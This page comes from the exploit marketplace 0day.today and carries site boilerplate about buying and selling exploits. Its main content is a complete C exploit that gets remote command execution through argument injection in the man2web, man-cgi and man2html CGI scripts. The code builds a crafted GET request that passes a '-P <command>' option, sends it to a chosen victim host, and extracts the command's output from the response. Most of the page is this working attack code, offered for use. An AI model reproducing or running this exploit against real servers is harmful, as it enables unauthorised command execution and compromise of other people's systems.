0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
man2web <= 0.88 Multiple Remote Command Execution Exploit (update2)
[===================================================================
man2web <= 0.88 Multiple Remote Command Execution Exploit (update2)
===================================================================
/*
* str0ke@server:~$ ./test some.edu "w" /cgi-bin/man2web 80 1
* /str0ke
*/
/* dl-mancgi.c v0.2
* x86/linux multipie man2web cgi-scripts remote command spawn
* found and coded by tracewar (darklogic team)
* for educaional purposes only.
*****************************************************************
* greetz goes to:
* matan peretz, ofer shaked, setuid, alex, majestic
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
void usage(char *argv0) {
fprintf(stderr, "x86/linux multipie man2web cgi-scripts remote command spawn\n");
fprintf(stderr, "researched by tracewar\n");
fprintf(stderr, "targets: \n0=man-cgi\n1=man2web\n2=man2html\n\n");
fprintf(stderr, "usage: %s <remote_host> <command> <path> <http server port> <target>\n", argv0);
fprintf(stderr, "example:");
fprintf(stderr, " %s 1.2.3.4 w /cgi-bin/man-cgi 80 0\n",argv0);
exit(0);
}
int main(int argc, char **argv) {
int sock, i, j, len = 0;
struct sockaddr_in serv_addr;
struct hostent *crap;
char *cp, dummy[50000], buffer[2000] = "GET ";
if(argc < 6)
usage(argv[0]);
if(atoi(argv[5]) == 0) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?-P ");
strcat(dummy, argv[2]);
strcat(dummy, " ls");}
else if(atoi(argv[5]) == 1) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?program=-P ");
strcat(dummy, argv[2]);
strcat(dummy, " ls");}
else if(atoi(argv[5]) == 2) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?section=-P");
strcat(dummy, argv[2]);
strcat(dummy, "&topic=w");}
else
usage(argv[0]);
printf("# crafting buffer string ... ");
for(i=0, j=4;i < strlen(dummy);i++) {
if(dummy[i] == ' ') {
strcat(buffer, "%20");
j+=3;}
else {
buffer[j] = dummy[i];
j++;}
}
strcat(buffer, "\r\n");
printf("(done)\n");
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0)
return printf("# error creating socket.\n");
crap = gethostbyname(argv[1]);
if(crap == NULL)
return printf("# cant resolve the specified hostname: %s\n", argv[1]);
else
printf("# connecting to victim... ");
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(atoi(argv[4]));
bcopy((char *)crap->h_addr, (char *)&serv_addr.sin_addr.s_addr, crap->h_length);
if (connect(sock, &serv_addr, sizeof(serv_addr)) < 0)
return printf("(error)\n# check again %s:%d\n", argv[1], atoi(argv[3]));
printf("(done)\n# sending crafted string... ");
if( (send(sock, buffer, strlen(buffer), 0)) == -1 )
return printf("\n# error while sending the crafted string.!\n");
printf("(done)\n# waiting for our call ...\n");
memset(buffer, 0x00, 2000);
memset(dummy, 0x00, 50000);
printf("\n\n");
while(recv(sock, buffer, 2000, 0) > 0)
strcat(dummy, buffer);
cp = &dummy[0];
i = 0; j = 0;
len = strlen(dummy);
if(atoi(argv[5]) == 0) {
while(strncmp(cp, "<hr>", 4) && i < len) {
cp++;
i++;
}
cp+=4;
while(strncmp(cp, "<hr>", 4) && strncmp(cp, "<A", 2) && j < len) {
j++;
cp++;
}
*cp = '\0';
cp = &dummy[0] + i + 4;
}
else if(atoi(argv[5]) == 1) {
while(strncmp(cp, "\<pre\>", 5) && i < len) {
cp++;
i++;
}
cp+=4;
while(strncmp(cp, "pre", 3) && j < len) {
j++;
cp++;
}
*cp = '\0';
cp = &dummy[0] + i + 6;
}
else if(atoi(argv[5]) == 2) {
while(strncmp(cp, "PRE", 3) && i < len) {
cp++;
i++;
}
cp+=2;
while(strncmp(cp, "PRE", 3) && j < len) {
j++;
cp++;
}
*cp = '\0';
cp = &dummy[0] + i + 2;
}
if(*cp == '\0')
return printf("# Bad response from the server.\n");
printf("%s", cp);
printf("\n\n");
close(sock);
return 0;
}
# 0day.today [2024-11-15] #